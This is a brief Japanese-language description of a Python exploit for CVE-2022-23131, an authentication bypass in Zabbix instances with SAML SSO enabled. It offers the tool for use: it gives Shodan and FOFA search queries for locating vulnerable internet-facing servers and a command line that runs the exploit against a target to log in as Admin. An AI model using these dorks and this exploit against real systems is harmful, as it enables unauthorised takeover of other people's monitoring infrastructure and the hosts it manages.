
CVE-2022-23131を標的としたPythonエクスプロイトで、ZabbixのSAML SSO認証バイパスを狙います。脆弱なインスタンスを発見するためのShodanおよびFOFA dorkも含まれています。
Zabbix - SAML SSO 認証バイパス
SAML SSO認証が有効になっている(デフォルトではない)インスタンスの場合、セッションに保存されたユーザーログインが検証されていないため、悪意のあるアクターによってセッションデータが変更される可能性があります。
shodan-query: http.favicon.hash:892542951
fofa-query: app="ZABBIX-监控系统" && body="saml"
python3 zabbix_session_exp.py -t https:target.com -u Admin